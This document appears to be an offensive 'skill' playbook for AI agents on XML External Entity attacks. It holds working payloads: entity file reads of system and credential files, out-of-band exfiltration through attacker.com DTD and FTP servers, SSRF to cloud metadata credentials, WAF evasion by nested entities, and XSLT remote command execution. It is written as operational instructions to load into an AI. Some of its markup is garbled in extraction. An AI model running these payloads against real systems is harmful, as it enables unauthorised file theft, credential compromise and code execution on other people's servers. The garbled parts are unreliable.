- SKILL: XML External Entity Injection (XXE) — Expert Attack Playbook
- AI LOAD INSTRUCTION
- Expert XXE techniques. Covers all injection contexts (SOAP, REST JSON→XML parsers, Office files, SVG), OOB exfiltration (critical when direct read fails), blind XXE detection, and XXE-to-SSRF chain. Base models often miss OOB and non-XML context XXE. For real-world CVE chains, Office docx XXE step-by-step, PHP expect:// RCE, and Solr XXE+RCE, load the companion SCENARIOS.md . 0. RELATED ROUTING Also load: upload insecure files when XXE is reachable through SVG, OOXML, import, or preview pipelines Extended Scenarios Also load SCENARIOS.md when you need: Apache Solr XXE + RCE chain (CVE-2017-12629) — XXE to read config, then VelocityResponseWriter for RCE Office docx XXE step-by-step — unzip → inject DOCTYPE into word/document.xml or [Content_Types].xml → repackage → upload DOCTYPE-based blind SSRF — PUBLIC external DTD reference triggers HTTP callback without entity reflection PHP expect:// protocol via XXE — direct command execution when expect extension is installed Blind XXE via error messages — force file path error that leaks content in exception text XXE in SOAP web services — inject entities into SOAP Envelope/Body elements 1. CLASSIC XXE PAYLOAD
<! DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]
< root
< data
&xxe; </ data
</ root
If /etc/passwd reflects in response → confirmed file read. 2. ATTACK SURFACE DISCOVERY Direct XML Inputs SOAP endpoints ( text/xml , application/soap+xml ) REST APIs accepting application/xml File upload: .xlsx , .docx , .pptx (Office Open XML) SVG uploads (SVG is XML) RSS/Atom feed parsers Web services with XML config import Non-Obvious XML Processing Change Content-Type header on any JSON POST to: Content-Type: application/xml Then rewrite body as XML — many backends use dual-format parsers or auto-detect. PDF Generators Some HTML→PDF tools (wkhtmltopdf, PrinceXML) execute SSRF via embedded URLs but also parse external entities in SVG/XML included in the HTML. 3. OOB (OUT-OF-BAND) XXE — CRITICAL Use when direct entity reflection fails (server parses but doesn't echo entity content): Step 1: Blind detection <! DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://BURP_COLLABORATOR/"> ]
< root
&xxe; </ root
DNS/HTTP hit to collaborator → confirms XXE (even if no file content returned). Step 2: OOB file exfiltration via attacker-hosted DTD Attacker's server hosts a malicious DTD at http://attacker.com/evil.dtd : <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % exfil "<!ENTITY exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>"> %exfil; Payload sent to target :
<! DOCTYPE foo [ <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd; ]
< root
&exfiltrate; </ root
File contents appear in attacker's HTTP server request log. Step 3: Error-based OOB (alternative when HTTP blocked) Use intentional error to leak data in error message:
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///NONEXISTENT/%file;'>"> %eval; %error; 4. XXE FILE READ TARGETS Linux : /etc/passwd /etc/shadow (requires root) /etc/hosts /proc/self/environ ← environment variables (DB creds, API keys) /proc/self/cmdline ← process command line /var/log/apache2/access.log ← may contain passwords in URLs /home/USER/.ssh/id_rsa ← SSH private key /home/USER/.aws/credentials ← AWS keys /home/USER/.bash_history Windows : C:\Windows\System32\drivers\etc\hosts C:\inetpub\wwwroot\web.config ← ASP.NET connection strings C:\xampp\htdocs\wp-config.php ← WordPress DB credentials C:\Users\Administrator.ssh\id_rsa 5. SVG XXE (file upload context) When SVG uploads are accepted and served/processed:
<! DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]
< svg xmlns = " http://www.w3.org/2000/svg " width = " 500 " height = " 100 "
< text font-size = " 16 "
&xxe; </ text
</ svg
Upload as .svg → GET /uploads/file.svg → file contents in response. 6. OFFICE FILE XXE (docx/xlsx/pptx) Office files are ZIP archives containing XML. Inject into [Content_Types].xml or word/document.xml :
Step 1: extract
unzip original.docx -d extracted/
Step 2: edit word/document.xml — add malicious DTD
Add after :
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
Then use &xxe; inside document text
Step 3: repackage
cd extracted && zip -r .. /malicious.docx . 7. SOAP ENDPOINT XXE SOAP requests parse XML by definition. Inject external entity into SOAP envelope:
<! DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]
< soap: Envelope xmlns: soap = " http://schemas.xmlsoap.org/soap/envelope/ "
< soap: Body
< getUser
< id
&xxe; </ id
</ getUser
</ soap: Body
</ soap: Envelope
- XXE → SSRF CHAIN XXE external entity can point to internal HTTP endpoints (identical to SSRF): <! DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]
< root
&xxe; </ root
This combines XXE file read + SSRF into a single payload. 9. XInclude ATTACK When server-side processes XInclude (import XML from another source), but you can't control the DOCTYPE: < foo xmlns: xi = " http://www.w3.org/2001/XInclude "
< xi: include href = " file:///etc/passwd " parse = " text " /> </ foo
Works in: Apache Cocoon, Xerces-J, libxml2 with XInclude support enabled. 10. PROTOCOL HANDLERS IN XXE
<!ENTITY xxe SYSTEM "http://internal.company.com/admin/">
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY xxe SYSTEM "ftp://attacker.com:21/x">
<!ENTITY xxe SYSTEM "gopher://127.0.0.1:6379/info%0d%0a"> 11. BYPASSING DEFENSES Parser blocks DOCTYPE Try XInclude (no DOCTYPE needed, see §9). Only allows specific XML schemas If schema validation occurs: inject comments or CDATA after schema validation but before entity processing. Response encoding issues (binary in response) Use PHP filter for base64: <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> Network restrictions on OOB Use DNS-only OOB via SYSTEM "file://HASH.attacker.com" — no HTTP required, DNS lookup leaks data. 12. QUICK DETECTION CHECKLIST □ Find XML input point (or JSON→XML transformation) □ Send basic entity: <!ENTITY xxe "test"> → &xxe; in body → does "test" reflect? □ If yes → file read: SYSTEM "file:///etc/passwd" □ If no reflection → OOB test via Collaborator URL □ If OOB hit → set up attacker DTD for file exfiltration □ Try SVG upload with XXE □ Try Content-Type: application/xml on JSON endpoints □ Try XInclude if DOCTYPE-based fails 13. LOCAL DTD INJECTION (BLIND XXE AMPLIFICATION) When external entities are blocked but local DTD files exist on the server: Technique
<! DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso ' <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &
x25; error SYSTEM
' file:///nonexistent/ % file; '
"> % eval; % error; '> %local_dtd; ]
Common Local DTD Paths Linux /usr/share/yelp/dtd/docbookx.dtd # GNOME Help /usr/share/xml/fontconfig/fonts.dtd # Fontconfig /usr/share/sgml/docbook/xml-dtd-/docbookx.dtd /usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd /opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd /usr/share/struts/struts-config_1_0.dtd # Apache Struts /usr/share/nmap/nmap.dtd # Nmap /opt/zaproxy/xml/alert.dtd # OWASP ZAP Windows C:\Windows\System32\wbem\xml\cim20.dtd # WMI C:\Windows\System32\wbem\xml\wmi20.dtd # WMI C:\Program Files\IBM\WebSphere*.dtd # WebSphere C:\Program Files (x86)\Lotus*.dtd # Lotus Notes Inside JAR Files (Java Applications) jar:file:///usr/share/java/tomcat-.jar!/javax/servlet/resources/web-app_2_3.dtd jar:file:///opt/wildfly/modules/.jar!/org/jboss/as/.dtd file:///usr/share/java/struts2-core-*.jar!/struts-2.5.dtd Why This Works External connections blocked (firewall/WAF/egress filter) But file:// to LOCAL files is usually allowed Local DTD is trusted → entity overrides inject attacker-controlled definitions Error messages or blind extraction via file:// still works 14. ADDITIONAL OOB EXFILTRATION CHANNELS FTP-based exfiltration (line-by-line) FTP protocol sends data line-by-line, making it useful for multi-line file exfiltration when HTTP-based OOB truncates at newlines:
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % exfil "<!ENTITY % send SYSTEM 'ftp://attacker.com:2121/%file;'>"> %exfil; %send; Run a rogue FTP server (e.g., xxeserv or custom Python) on port 2121 — each line of the file arrives as a separate RETR or CWD command. HTTP parameter exfiltration <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://attacker.com/?d=%file;'>"> %exfil; %send; Base64 encoding avoids newline/special-character issues in HTTP URL. Decode the d= parameter on attacker server. 15. DTD NESTING TRICKS — PARAMETER ENTITY CHAINING Parameter entity within parameter entity Used to bypass parsers that block direct entity references in entity values: <! DOCTYPE foo [ < !ENTITY % a "% b;"
<!ENTITY % b SYSTEM "http://attacker.com/chain.dtd"> %a; ]
The parser expands %a; → %b; → fetches external DTD. Some WAFs only inspect the first level of entity definitions. Triple-nested for filter evasion
<!ENTITY % s2 SYSTEM "http://attacker.com/stage2.dtd"> %s2;
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % s3 "<!ENTITY
%
exfil SYSTEM 'http://attacker.com/?d=%file;'>">
%s3;
%exfil;
Payload sent to target only references
stage1.dtd
— the actual file read happens two DTD fetches deep, evading shallow WAF inspection.
16. XXE IN NON-OBVIOUS FORMATS
Format
XML Location
Injection Point
SOAP Envelope
Entire body is XML
Add DOCTYPE before
]> in SVG header OOXML (.docx) word/document.xml , [Content_Types].xml Inject DOCTYPE + entity into any XML member OOXML (.xlsx) xl/sharedStrings.xml , xl/worksheets/sheet1.xml Entity reference in cell values RSS/Atom feeds Feed body is XML Inject into feed items if user content is included SAML assertions SAML XML tokens DOCTYPE injection in SAMLResponse parameter (base64-decoded XML) XMPP Protocol messages are XML stanzas Entity in message body or JID fields GPX files GPS track data in XML Via file upload endpoints accepting GPX XHTML Strict XHTML is valid XML DOCTYPE injection in XHTML documents SAML XXE
<! DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]
< samlp: Response xmlns: samlp = " urn:oasis:names:tc:SAML:2.0:protocol "
< saml: Assertion
< saml: Subject
< saml: NameID
&xxe; </ saml: NameID
</ saml: Subject
</ saml: Assertion
</ samlp: Response
Re-encode to base64, submit as SAMLResponse parameter. 17. XXE VIA FILE UPLOAD SVG upload
<! DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]
< svg xmlns = " http://www.w3.org/2000/svg " width = " 500 " height = " 500 "
< text x = " 10 " y = " 50 " font-size = " 14 "
&xxe; </ text
</ svg
Upload as avatar/image → view uploaded SVG → file content rendered as text. XLSX (Excel) upload
1. Create minimal .xlsx, unzip it
unzip report.xlsx -d xlsx_tmp/
2. Inject into xl/sharedStrings.xml
Add after XML declaration:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
Replace a element content with &xxe;
3. Repackage
cd xlsx_tmp && zip -r .. /malicious.xlsx . Alternatively inject into [Content_Types].xml (parsed first by most OOXML processors). DOCX upload
Target: word/document.xml
Same approach: unzip → inject DOCTYPE + entity → repackage
Alternative: inject into customXml/item1.xml if custom XML parts exist
Processing pipeline attack Even if the uploaded file is not directly rendered, the server-side parser (Apache POI, python-docx, OpenXML SDK) may process entities during import, triggering OOB exfiltration. 18. ERROR-BASED XXE Force the XML parser to generate an error message containing file content: Method 1: Non-existent file reference
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY
%
error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
The parser attempts to open
file:///nonexistent/
The jar: protocol handler generates verbose error messages that include the expanded entity value. Method 3: Integer overflow / type error <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % int "<!ENTITY % trick SYSTEM 'file:///%file;'>"> %int; %trick; Parser tries to open a file path containing the target file content → error message reveals content. 19. XSLT INJECTION CONNECTION TO XXE XSLT processors parse XML and can be chained with XXE: XSLT file read
< xsl: stylesheet version = " 1.0 " xmlns: xsl = " http://www.w3.org/1999/XSL/Transform "
< xsl: template match = " / "
< xsl: value-of select = " document('file:///etc/passwd') " /> </ xsl: template
</ xsl: stylesheet
XSLT RCE (processor-dependent)
< xsl: stylesheet version = " 1.0 " xmlns: xsl = " http://www.w3.org/1999/XSL/Transform " xmlns: rt = " http://xml.apache.org/xalan/java/java.lang.Runtime "
< xsl: template match = " / "
< xsl: variable name = " rtObj " select = " rt:getRuntime() " /> < xsl: variable name = " process " select = " rt:exec($rtObj,'id') " /> </ xsl: template
</ xsl: stylesheet
< xsl: stylesheet version = " 1.0 " xmlns: xsl = " http://www.w3.org/1999/XSL/Transform " xmlns: php = " http://php.net/xsl "
< xsl: template match = " / "
< xsl: value-of select = " php:function('system','id') " /> </ xsl: template
</ xsl: stylesheet
XXE → XSLT chain If the target accepts XML input with a stylesheet reference (
), inject both an external entity and a malicious XSLT to escalate from file read to RCE.